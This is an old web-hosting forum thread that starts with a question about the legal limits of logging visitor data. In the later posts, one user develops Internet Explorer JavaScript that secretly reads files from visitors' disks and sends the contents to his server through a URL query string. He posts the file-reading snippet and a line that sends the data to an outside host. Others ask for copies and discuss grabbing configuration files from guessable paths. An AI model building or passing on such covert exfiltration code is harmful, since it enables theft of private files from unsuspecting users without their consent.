| View previous topic :: View next topic |
| Author |
Message |
jmoschetti45
-
Joined: 29 Oct 2003
Posts: 95
Location: MI USA
|
 Posted: Sat Mar 27, 2004 5:33 pm Post subject: Logging and legal issues |
 |
|
Well this is going to sound stupid but someone wants to sue me because I use AWStats and I have it set up to get their resolution and what their browser is capable of doing. I don't think they have any legal reason too. Is there actually a limit to what I can legally log?
_________________
http://jmoschetti45.com |
|
| Back to top |
       |
 |
nquin321
-
Joined: 29 Jan 2004
Posts: 296
Location: Right Behind You
|
| Posted: Sat Mar 27, 2004 5:48 pm Post subject: |
|
|
I don't think there is a limit to what you can log but to be legally protected
create a privacy policy.
Like this one: http://www.google.com/privacy.html |
|
| Back to top |
|
|
jmoschetti45
-
Joined: 29 Oct 2003
Posts: 95
Location: MI USA
|
| Posted: Sat Mar 27, 2004 5:50 pm Post subject: |
|
|
I already have one. It clearly states that all that is logged. I figure even if he does bother to press charges I should have good odds of getting out of this mess without any harm.
_________________
http://jmoschetti45.com |
|
| Back to top |
|
|
iNaNimAtE
-
Joined: 05 Nov 2003
Posts: 2381
Location: Everywhere you're not.
|
| Posted: Sat Mar 27, 2004 8:34 pm Post subject: |
|
|
There is nothing wrong with logging user information (to a point). You can log monitor resolution, et cetera, as long as you state it in the privacy policy.
What you can't (legally) log: PID, personal information (name, address, et cetera), files stored on the computer (unless the user explicitly agrees to it), and running processes. I'm sure there are other things I forgot, but that is the basic idea.
_________________
Bienvenidos! |
|
| Back to top |
 |
|
jmoschetti45
-
Joined: 29 Oct 2003
Posts: 95
Location: MI USA
|
| Posted: Sun Mar 28, 2004 2:04 am Post subject: |
|
|
So it would be illegal to modify the misc_tracker.js AWStats script to return the contents of files even if it is in the privacy policy? Also, does that mean my auto IP lookup script violates privacy? It takes the incomming IP and does a Whois on it and records the results in a file.
_________________
http://jmoschetti45.com |
|
| Back to top |
|
|
iNaNimAtE
-
Joined: 05 Nov 2003
Posts: 2381
Location: Everywhere you're not.
|
| Posted: Sun Mar 28, 2004 6:21 am Post subject: |
|
|
No, WHOIS information is public. It is only illegal if you collect it on purpose.
_________________
Bienvenidos! |
|
| Back to top |
|
|
TRUSTAbyss
-
Joined: 29 Oct 2003
Posts: 3752
Location: USA, GA
|
| Posted: Sun Mar 28, 2004 1:07 pm Post subject: |
|
|
If you want to keep an eye on your log files
without sneaky little users on your site getting
in your business, use Weblog Expert Lite , its free!
http://www.weblogexpert.com |
|
| Back to top |
|
|
iNaNimAtE
-
Joined: 05 Nov 2003
Posts: 2381
Location: Everywhere you're not.
|
| Posted: Sun Mar 28, 2004 7:23 pm Post subject: |
|
|
I've got the full version of WebLog Expert, and it is worth all the money. If you want a little more complex logs, I definitely recommend that one.
_________________
Bienvenidos! |
|
| Back to top |
|
|
jmoschetti45
-
Joined: 29 Oct 2003
Posts: 95
Location: MI USA
|
| Posted: Mon Mar 29, 2004 3:45 am Post subject: |
|
|
Ok I will look into that as soon as I have some time. I was doing a little coding last night until about 5am and came across a way to get pretty much anything off someones machine and back onto my server. I bet its illegal though right even if its in my privacy policy?
_________________
http://jmoschetti45.com |
|
| Back to top |
|
|
Anonymoose
-
Joined: 09 Sep 2003
Posts: 2192
|
| Posted: Mon Mar 29, 2004 1:50 pm Post subject: |
|
|
| jmoschetti45 wrote: | | Ok I will look into that as soon as I have some time. I was doing a little coding last night until about 5am and came across a way to get pretty much anything off someones machine and back onto my server. I bet its illegal though right even if its in my privacy policy? |
What exactly are you talking about in terms of getting "anything off someone's machine" ? If you mean browser resolution or any other information that is leaked to you deliberately by their choice of browser, there is no problem logging whatever you want. If you mean trying to take a copy of their password file from their Windows directory / get a document from the My Documents folder without their consent, you're on very dodgy ground. Both US and UK law would view this as accessing a system without explicit permission and put you in the wrong.
As a secondary thought, is your method to use an existing exploit for a particular browser, or are you talking of an problem in a general scripting language that allows access from all browsers ? If you've coded something and only tested it on IE, I'd be very suprised if it still leaks information to you in Mozilla/Opera/etc.
I'd be interested to see it in action if you need a non suing guinea pig :wink: |
|
| Back to top |
|
|
goose
-
Joined: 17 Sep 2002
Posts: 608
Location: The Land Of OZ! come here toto!
|
| Posted: Mon Mar 29, 2004 4:26 pm Post subject: |
|
|
maybe i should sue the government for not giving me a job!!
:lol:
like they give a shit! :twisted:
_________________
living in an armish paradise.....no gates here!
mawuahahaha :) |
|
| Back to top |
|
|
jmoschetti45
-
Joined: 29 Oct 2003
Posts: 95
Location: MI USA
|
| Posted: Mon Apr 05, 2004 3:05 am Post subject: |
|
|
What I was doing was using JavaScript to read a file. It can display the contents of text files in your browser for you. So I loaded the contents in a variable and requested a page on my server like this: missing_page.php?{$file_buffer_here}. The text from the file would then show up in the log as a 404 because the page did not exist. I have only tested this on IE 5.5 and 6. I will improve the script and posibly post a copy here if thats legal and anyone is interested. It will be a while though until its working exactly like I want it too.
_________________
http://jmoschetti45.com |
|
| Back to top |
|
|
msmollison
-
Joined: 24 Feb 2004
Posts: 15
|
| Posted: Mon Apr 05, 2004 5:06 am Post subject: |
|
|
| well you can send it to me even if it is illegal :D who's to say i am going to use it? |
|
| Back to top |
|
|
TRUSTAbyss
-
Joined: 29 Oct 2003
Posts: 3752
Location: USA, GA
|
| Posted: Mon Apr 05, 2004 5:11 am Post subject: |
|
|
I wouldn't mind using it either , it could be
a usefull tool to catch crackers , oh im sorry
I guess I meant the word "hackers" :) |
|
| Back to top |
|
|
jmoschetti45
-
Joined: 29 Oct 2003
Posts: 95
Location: MI USA
|
| Posted: Mon Apr 05, 2004 7:46 pm Post subject: |
|
|
Now that people are interested I will step up development a little. I should have a semi-working beta version in a week or so.
_________________
http://jmoschetti45.com |
|
| Back to top |
|
|
jmoschetti45
-
Joined: 29 Oct 2003
Posts: 95
Location: MI USA
|
| Posted: Mon Apr 05, 2004 8:47 pm Post subject: |
|
|
I just finished a very pre-alpha version. Let me know if you want the full version. Below is a sample of the script:
| Code: | filehandle=window.open('file://C:/test.txt');
filecontents=filehandle.document.body.innerText;
filehandle.close();
alert(filecontents); |
It will show the user the contents of the file in a pop up box.
Its been tested in IE 5.5 and 6.
_________________
http://jmoschetti45.com |
|
| Back to top |
|
|
Anonymoose
-
Joined: 09 Sep 2003
Posts: 2192
|
| Posted: Wed Apr 07, 2004 12:21 am Post subject: |
|
|
That shows the local file to the user though, and executes in the local zone. Can you confirm that it will allow you to access a users files remotely ?
Trustpunk, how on earth do you think that would help you catch hackers ? |
|
| Back to top |
|
|
jmoschetti45
-
Joined: 29 Oct 2003
Posts: 95
Location: MI USA
|
| Posted: Wed Apr 07, 2004 2:46 am Post subject: |
|
|
Yes it executes it locally, but its so fast you don't see the window. Im still working on the 'phoneing home' feature. Something similar to this
| Code: | | url="http://www.xyz.com/crap.pl?" + filecontents; |
Note: I just came up with that right now, the syntax might not be perfect.
Then just open a blank window and point it to 'url' and quickly close it.
Its not perfect yet, but once I get a good version done and we all put our heads together we'll come up with something good :wink:
_________________
http://jmoschetti45.com |
|
| Back to top |
|
|
Anonymoose
-
Joined: 09 Sep 2003
Posts: 2192
|
| Posted: Wed Apr 07, 2004 8:45 am Post subject: |
|
|
| Hmm, that's pretty sneaky :D You do have to know the path to the users file though. Wouldn't stop you grabbing things like someone's Abyss configuration files or anything that you could have half a chance of guessing the right path for... 8O |
|
| Back to top |
|
|
jmoschetti45
-
Joined: 29 Oct 2003
Posts: 95
Location: MI USA
|
| Posted: Wed Apr 07, 2004 3:48 pm Post subject: |
|
|
One problem with stealing Abyss config files. The extension is .conf. IE will attempt to download the file instead of displaying it. That dosen't work. This only works with files that IE will display not pop up a download box for. The fixed path is also a minor problem. Im working on the phoneing home feature right now.
_________________
http://jmoschetti45.com |
|
| Back to top |
|
|
|
